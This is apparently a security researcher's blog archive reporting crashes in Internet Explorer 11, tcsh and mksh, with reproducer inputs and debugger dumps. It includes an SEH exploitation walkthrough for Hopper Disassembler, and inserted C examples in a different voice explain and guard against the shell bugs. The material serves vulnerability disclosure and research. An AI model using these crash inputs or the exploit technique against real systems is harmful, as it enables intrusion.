Monday, 22 June 2015

Browsing stackoverflow for interesting crashes - Microsoft Internet Explorer 11

Here is a nice example of why it is worth browsing stackoverflow.com for crash reports. Recently I stumbled upon this post:
http://stackoverflow.com/questions/28114732/internet-explorer-11-crashes-when-angulars-http-post-is-used-with-large-complex

I checked it out, and as of today (22 Jun 2015) it crashes the latest Internet Explorer 11. The crash log looks interesting:
The proof of concept from the post is huge, so I decided to downsize it a bit; here it is:
Certainly more readable. As usual, maybe someone will find it useful.

From one of the comments in the stackoverflow discussion we can see that Microsoft was already looking into it (23 Jan 2015).

Sunday, 7 June 2015

Microsoft Internet Explorer 11 Crash PoC

A test case that looked interesting at first, but most likely it is only a null pointer dereference. Anyway, you can find the proof of concept below.

It was tested on Windows 7 and 8.1; it doesn't crash older versions of IE, as the faulty code was introduced in IE11.

Friday, 3 April 2015

Crashing Shells

A quick post about two crashes I found in tcsh (the default FreeBSD shell; however, the BSD version does not segfault) and mksh (the default shell on Android). As I'm not planning to research them further, I will just leave them here. Maybe someone will figure out whether any of this can be exploited somehow.

tcsh:
1. Affected version
tcsh 6.18.01 and maybe older. The FreeBSD version handled it just fine.

2. PoC
$ perl -e 'print "\$?:\x80"' | tcsh

Program received signal SIGSEGV, Segmentation fault.
0x080d827a in xputchar (c=8388738) at sh.print.c:156
156 if(iscntrl(c) && (ASC(c) < 0x80 || MB_CUR_MAX == 1)) {
(gdb) x/i $eip
=> 0x80d827a : movzwl (%eax,%ebx,2),%edx
The last byte (the \x80 in the PoC above) can be anything > 0x79 to trigger the crash.
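The crash above is a ctype lookup with an argument (8388738 == 0x800082) far outside the range the ctype functions are defined for: the C standard only covers unsigned char values and EOF, and glibc implements iscntrl() by indexing a table of 16-bit entries with the argument, which is what the movzwl (%eax,%ebx,2) in the disassembly is. The following is an added example, not tcsh's code, showing the shape of the bug and a range-checked wrapper; the Char type, META_FLAG and the function names are assumptions made for the illustration.

```c
/* Added example, not tcsh's code: a value wider than a byte reaching
 * iscntrl(), and a range-checked wrapper that cannot index outside the
 * classification table. */
#include <ctype.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>

/* Assumption for this example: characters travel through the shell in a
 * 32-bit type so that flag bits can be attached to a byte. META_FLAG is a
 * made-up flag, not a tcsh definition. */
typedef int32_t Char;
#define META_FLAG 0x800000
#define ASC(c)    ((c) & 0xff)

/* The argument seen in the crash on this page: 8388738 == 0x800082. */
#define CRASH_VALUE 8388738

/* Domain of the ctype functions: EOF or a value representable as
 * unsigned char. Anything else indexes the glibc table out of bounds
 * (0x800082 * 2 bytes is roughly 16 MB past it). */
int in_ctype_range(Char c)
{
    return c == EOF || (c >= 0 && c <= UCHAR_MAX);
}

/* The faulty shape: the flagged value goes straight to the lookup.
 * Never call this with an out-of-range value; it is here for contrast. */
int unsafe_is_control(Char c)
{
    return iscntrl(c) != 0;
}

/* Hardened: refuse to classify anything outside the defined domain. A
 * flagged value is not a plain byte, so it is reported as "not a control
 * character" instead of being looked up. */
int safe_is_control(Char c)
{
    if (c == EOF || !in_ctype_range(c))
        return 0;
    return iscntrl((unsigned char)c) != 0;
}

/* Walk every high-bit byte tagged with the flag (the class of input the
 * PoC sends) and confirm none of them would reach the table lookup. */
int flagged_bytes_rejected(void)
{
    for (int b = 0x80; b <= 0xff; b++)
        if (in_ctype_range(META_FLAG | b))
            return 0;
    return 1;
}

int main(void)
{
    printf("0x%x in ctype range: %d\n", CRASH_VALUE, in_ctype_range(CRASH_VALUE));
    printf("safe_is_control('\\n') = %d, safe_is_control(crash value) = %d\n",
           safe_is_control('\n'), safe_is_control(CRASH_VALUE));
    printf("all flagged high-bit bytes rejected: %d\n", flagged_bytes_rejected());
    return 0;
}
```

The same check applies to every ctype function: cast to unsigned char first, or test the range explicitly, before the value is used as an index.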

Android shell / mksh:

1. Affected version
mksh-R50e and maybe older. Tested on latest source version and a Nexus with Android 5.0.1

2. PoC

D:\Android\sdk\platform-tools>adb shell # run shell
shell@mako:/ $ cd sdcard # must be a dir that is not read-only
cd sdcard
shell@mako:/sdcard $ 4444444444444>4 # actual input that causes the crash
4444444444444>4

D:\Android\sdk\platform-tools> # our shell died 


It seems to crash at exec.c:1415 in function iosetup(), at the line: if (e->savefd[iop->unit] == 0) {

Update:
By manipulating the numeric part of the expression we can control the EAX and EBP values, e.g.:

$ 10947955850>1

Program received signal SIGSEGV, Segmentation fault.
0x80009c92 in ?? ()
(gdb) i r
eax            0x8c8c8c8a       -1936946038
ecx            0x3      3
edx            0x0      0
ebx            0x8003be50       -2147238320
esp            0xbffff210       0xbffff210
ebp            0x991da068       0x991da068
esi            0x80044a54       -2147202476
edi            0x2      2
eip            0x80009c92       0x80009c92
eflags         0x10206  [ PF IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
$ 1000200887800>1
Program received signal SIGSEGV, Segmentation fault.
0x80009c92 in ?? ()
(gdb) i r
eax            0xe09e5df8       -526492168
ecx            0x3      3
edx            0x0      0
ebx            0x8003be50       -2147238320
esp            0xbffff210       0xbffff210
ebp            0x41414344       0x41414344
esi            0x80044a54       -2147202476
edi            0x2      2
eip            0x80009c92       0x80009c92
eflags         0x10206  [ PF IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) bt
#0  0x80009c92 in ?? ()
Backtrace stopped: Cannot access memory at address 0x41414348
The bug has been patched in the latest mksh release, R50f.
The bug report can be seen here and the fix here.
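The register dumps are consistent with the number in front of '>' being narrowed to 32 bits before it is used as the index into savefd: the low 32 bits of 10947955850 are 0x8c8c8c8a and those of 1000200887800 are 0xe09e5df8, the two eax values above. The following added example (not mksh's code) models that narrowing and shows a bounded parse that never lets the number reach an array index; NUFILE, the savefd table and the function names are assumptions for the illustration.

```c
/* Added example, not mksh's code: a redirection "N>file" whose N does not
 * fit in 32 bits, the value it degenerates to, and a bounded parser. */
#include <ctype.h>
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Assumption: the shell keeps one saved descriptor per redirectable unit
 * in a small fixed table, as e->savefd[iop->unit] in iosetup() suggests.
 * NUFILE is a made-up size for this example, not mksh's constant. */
#define NUFILE 32
static int savefd[NUFILE];

/* What survives of a too-large unit after an unchecked narrowing to 32
 * bits (hypothetical model of the truncation; digit-by-digit wrapping
 * arithmetic gives the same result). Used as an index this points far
 * outside savefd. */
uint32_t truncated_unit(const char *spec)
{
    return (uint32_t)strtoull(spec, NULL, 10);
}

/* Bounded parse of the unit in "N>target". Rejects a non-digit first
 * character (so "-1>x" and " 4>x" fail), overflow, trailing junk before
 * '>' and anything that is not a valid slot of the table. */
int parse_redirect_unit(const char *spec, int *unit)
{
    char *end;
    if (!isdigit((unsigned char)spec[0]))
        return -1;
    errno = 0;
    unsigned long v = strtoul(spec, &end, 10);
    if (errno == ERANGE || *end != '>' || v >= NUFILE)
        return -1;
    *unit = (int)v;
    return 0;
}

/* Guarded equivalent of the lookup that crashed: -1 instead of an
 * out-of-bounds read. */
int lookup_savefd(const char *spec)
{
    int unit;
    if (parse_redirect_unit(spec, &unit) != 0)
        return -1;
    return savefd[unit];
}

/* The parsed unit number, or -1 when the spec is rejected. */
int parsed_unit(const char *spec)
{
    int unit;
    return parse_redirect_unit(spec, &unit) == 0 ? unit : -1;
}

int main(void)
{
    /* Constructed inputs: the three from this post plus a valid one. */
    const char *specs[] = {"4444444444444>4", "10947955850>1",
                           "1000200887800>1", "4>4"};
    for (size_t i = 0; i < sizeof specs / sizeof specs[0]; i++)
        printf("%-18s narrows to 0x%08x, bounded parse -> %d\n",
               specs[i], truncated_unit(specs[i]), parsed_unit(specs[i]));
    return 0;
}
```

On a 32-bit build strtoul() itself reports ERANGE for the long inputs; on a 64-bit build the value fits in unsigned long and is caught by the v >= NUFILE check, so the guard holds either way.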

Tuesday, 10 February 2015

Microsoft Internet Explorer CShadow Direction Integer Overflow Remote Code Execution CVE-2015-0036 (MS15-009)

In this month's bulletin Microsoft fixed multiple vulnerabilities in Internet Explorer, including one of mine: an integer overflow in the CShadow filter that could lead to remote code execution. It affected Internet Explorer 10 and 11. You can find the original ZDI advisory here and the Microsoft bulletin here.

There is some confusion regarding the CVE assignment: Microsoft acknowledged me for CVE-2015-0035 (also credited to Sky), while ZDI marked my bug as CVE-2015-0036, which is credited to an anonymous researcher on the bulletin page. I will update this post if anything changes regarding that.

Monday, 24 November 2014

Hopper Disassembler 2.8.7 / 3.6.2 Mach-O Handling Buffer Overflow

Inspired by @j00ru's talk at SECURE 2014, I decided to do a quick check of Hopper Disassembler (which is a great tool, by the way; I highly recommend it).

As a sample I simply used one of the system tools from OS X (/bin/ls) and started fuzzing. I quickly began recording tons of crashes. The most interesting one was this:


And the file diff showed something like this:
It's pretty straightforward, right? I checked the modules, and a standard SEH exploit should work for us:
I calculated the offsets:
By now I thought it was over, but the first problems showed up when I wanted to substitute my A's and B's with pointers and other non-printable characters (e.g. NOPs or INT 3): Hopper would not crash at all.
Instead of NOPs I could use \x40\x48, which is inc eax, dec eax.


Regarding the SEH overwrite, I couldn't use a short jump, so I had to find a pointer that would later assemble to an instruction that wouldn't crash. Fortunately libpng had a nice ASCII-printable pointer which I could use for pop pop ret.


Next there was a problem with ASCII-only shellcode. I needed one of the registers to point to it, but in the case of SEH the registers are XOR'ed. I found a solution here. Basically, by using multiple POPAD instructions we can get ESP to point to our buffer and then return to it.
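Everything above hinges on keeping every byte of the payload printable, which is why NOPs, INT 3 and the usual short jump in the nSEH slot were out while \x40\x48 and POPAD (0x61, 'a') were fine. The added example below (not the exploit from the post) is a small C checker for that constraint plus the stack arithmetic behind the POPAD trick; the printable range 0x20..0x7e and the sample addresses are assumptions, not values taken from Hopper.

```c
/* Added example, not the exploit from the post: a checker for the
 * printable-ASCII constraint the fuzzed field imposes, and the ESP
 * arithmetic behind chaining POPAD instructions. Addresses are
 * placeholders. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed constraint: printable ASCII 0x20..0x7e survives the parse. */
int is_printable_byte(uint8_t b)
{
    return b >= 0x20 && b <= 0x7e;
}

/* Index of the first byte that violates the constraint, or -1 if clean. */
long first_bad_byte(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (!is_printable_byte(buf[i]))
            return (long)i;
    return -1;
}

/* A pointer written little-endian into the buffer passes the same filter
 * byte by byte, which is why the pop/pop/ret address had to be
 * all-printable too. */
int is_printable_ptr(uint32_t p)
{
    for (int i = 0; i < 4; i++)
        if (!is_printable_byte((uint8_t)(p >> (8 * i))))
            return 0;
    return 1;
}

/* Instruction bytes discussed in the post and the usual alternatives. */
static const uint8_t NOP[]       = {0x90};        /* rejected */
static const uint8_t INT3[]      = {0xcc};        /* rejected */
static const uint8_t JMP_SHORT[] = {0xeb, 0x06};  /* classic nSEH, rejected */
static const uint8_t INC_DEC[]   = {0x40, 0x48};  /* inc eax; dec eax: "@H" */
static const uint8_t POPAD[]     = {0x61};        /* popad: "a" */

/* POPAD pops eight dwords (EDI, ESI, EBP, a skipped ESP slot, EBX, EDX,
 * ECX, EAX), so each one moves ESP up by 32 bytes whatever it loads. */
uint32_t esp_after_popads(uint32_t esp, unsigned n)
{
    return esp + 32u * n;
}

/* Smallest POPAD count that moves ESP to or past target; -1 when target
 * is below ESP, since POPAD only ever moves the stack pointer up. */
long popads_to_reach(uint32_t esp, uint32_t target)
{
    if (target < esp)
        return -1;
    return (long)((target - esp + 31u) / 32u);
}

int main(void)
{
    /* Placeholder stack values, not from the real crash. */
    uint32_t esp = 0x0012f000, buffer = 0x0012f100;
    long n = popads_to_reach(esp, buffer);
    printf("inc/dec sled clean: %ld, nop clean: %ld, jmp short clean: %ld\n",
           first_bad_byte(INC_DEC, sizeof INC_DEC), first_bad_byte(NOP, 1),
           first_bad_byte(JMP_SHORT, 2));
    printf("%ld POPADs move esp 0x%08x -> 0x%08x (target 0x%08x)\n",
           n, esp, esp_after_popads(esp, (unsigned)n), buffer);
    printf("0x41414141 printable: %d, 0x7c9cfa00 printable: %d\n",
           is_printable_ptr(0x41414141), is_printable_ptr(0x7c9cfa00));
    return 0;
}
```

Running first_bad_byte() over the whole generated buffer before sending it is the quickest way to catch the "no crash at all" symptom described above: a single pointer byte outside the range is enough to make the parser give up before the overflow.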

Now we can just generate our shellcode and place it in the controlled area:

When we let it run we get:
Short demo:

The final result can be downloaded here: Hopper run calc

Vulnerable versions:
Hopper 2.8.7 and probably older versions (tested on Windows)
Hopper 3.6.2 and probably older versions (tested on Mac OS X)
Linux version was not tested.

Timeline:
17 Nov 2014 - issue reported to the vendor
18 Nov 2014 - vendor releases a fix for Mac OS X (3.6.3 version)
24 Nov 2014 - publication of this article
The Windows version remains unpatched, as its development is currently on hold.

Tuesday, 22 July 2014

SyScan360 2014 - Mobile Browsers Security: iOS

Last week, together with Lukasz Pilorz, I spoke about mobile browser security on iOS at SyScan360 in Beijing. Visiting China for the first time was a great experience, and the conference itself was just awesome. Cool people, very technical talks and good organization are what make this event exceptional.

Our slides are already available for download from the conference site here.

Sunday, 22 June 2014

Microsoft Internet Explorer 11 (11.0.9600.17107) MSHTML!CStr::_Free Crash

Another crash in IE11; maybe someone will find it interesting. It occurs when opening the Developer Tools (F12). After I finished minimizing the test case it turned out to be just one line:


To reproduce the crash it is required to:
1. enable page heap
2. open the html file
3. press F12 / open Developer Tools
You also need the exact build version from the title (or lower), because this issue was fixed in the latest Microsoft Security Bulletin (https://technet.microsoft.com/en-us/library/security/ms14-jun.aspx). I have not really investigated the crash, because I found it the day before Patch Tuesday, and when it got fixed I moved on.

(b5c.5fc): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\MSHTML.dll -
eax=00000000 ebx=00000000 ecx=07d30fdc edx=6bda90b0 esi=07d30fdc edi=0a294fe8
eip=6bc0f36a esp=048b93a0 ebp=048b93bc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
MSHTML+0x4f36a:
6bc0f36a 8b06            mov     eax,dword ptr [esi]  ds:0023:07d30fdc=00000001
0:005> .symfix
0:005> .reload
Reloading current modules
................................................................
...............
0:005> r
eax=00000000 ebx=00000000 ecx=07d30fdc edx=6bda90b0 esi=07d30fdc edi=0a294fe8
eip=6bc0f36a esp=048b93a0 ebp=048b93bc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
MSHTML!CStr::_Free+0x5:
6bc0f36a 8b06            mov     eax,dword ptr [esi]  ds:0023:07d30fdc=00000001
0:005> k
ChildEBP RetAddr 
048b93a0 6c222df4 MSHTML!CStr::_Free+0x5
048b93bc 6c50fb52 MSHTML!CListenerDispatch::ConstructCode+0x78
048b9494 6c365616 MSHTML!CDoc::DynamicAttachDebugger+0x350
048ba078 6bd42176 MSHTML!CDoc::ExecHelper+0x623721
048ba098 6eeb93dd MSHTML!CDoc::Exec+0x21
048ba0e8 6eeb9097 DiagnosticsTap!DebugThreadController::IOleCommandTargetExec+0xb9
048ba11c 6eeb8ef0 DiagnosticsTap!DebugThreadController::EnableSourceRundown+0x4e
048ba134 6eec4294 DiagnosticsTap!DebugThreadController::Initialize+0x81
048ba154 6b5479f1 DiagnosticsTap!TapObject::CreateDebuggerController+0x9f
048ba1d0 6b5474a2 F12Tools!BHOSite::LaunchOutOfProcHost+0x205
048ba454 6b546bdc F12Tools!BHOSite::InitializeWindowsAndThreads+0x3bc
048ba480 75e07051 F12Tools!BHOSite::SetSite+0xb0
048ba498 66d226e8 shcore!IUnknown_SetSite+0x2c
048ba4cc 66f424ab IEFRAME!CBandSite::_AddBandByID+0xe5
048ba508 66f2a446 IEFRAME!CBandSite::AddBandWithCLSID+0x3b
048ba550 66f296e5 IEFRAME!CShellBrowser2::_GetInfoBandBS+0x177
048ba5a4 66f2e01d IEFRAME!CShellBrowser2::_EnsureAndNavigateBand+0x8e
048ba5c8 66ddf834 IEFRAME!CShellBrowser2::_ShowHideBrowserBar+0x60
048ba5ec 66e6712d IEFRAME!CShellBrowser2::_SetBrowserBarState+0x1b9
048ba878 66f2f2f0 IEFRAME!CShellBrowser2::Exec+0x23a758
048bbb38 66e654e8 IEFRAME!CShellBrowser2::v_OnCommand+0xc72
048bc390 66c3b164 IEFRAME!CBaseBrowser2::v_WndProc+0x228497
048bc484 66c281f5 IEFRAME!CShellBrowser2::v_WndProc+0x1ae
048bc4a8 779d75b3 IEFRAME!CShellBrowser2::s_WndProc+0x58
048bc4d4 779d77b8 user32!_InternalCallWinProc+0x23
048bc554 779d9744 user32!UserCallWinProcCheckWow+0x110
048bc5b0 779d9894 user32!DispatchClientMessage+0xb5
048bc5d8 77b92cde user32!__fnDWORD+0x2c
048bc608 779ed2a1 ntdll!KiUserCallbackDispatcher+0x2e
048bc60c 66d093e6 user32!NtUserTranslateAccelerator+0xa
048bc62c 66d09383 IEFRAME!CShellBrowser2::TranslateAcceleratorSB+0x34
048bc654 66d09214 IEFRAME!CShellBrowser2::_MayTranslateAccelerator_CCommonBrowser+0xb7
048bc680 66cf6d9f IEFRAME!CShellBrowser2::_MayTranslateAccelerator+0x3b
048bf840 66c8358f IEFRAME!CTabWindow::_TabWindowThreadProc+0x587
048bf8f8 71ec1b7c IEFRAME!LCIETab_ThreadProc+0x31c
048bf908 6eb531cc iertutil!_IsoThreadProc_WrapperToReleaseScope+0xe
048bf934 762b17ad IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x71
048bf940 77b73af4 KERNEL32!BaseThreadInitThunk+0xe
048bf984 77b73acd ntdll!__RtlUserThreadStart+0x20
048bf994 00000000 ntdll!_RtlUserThreadStart+0x1b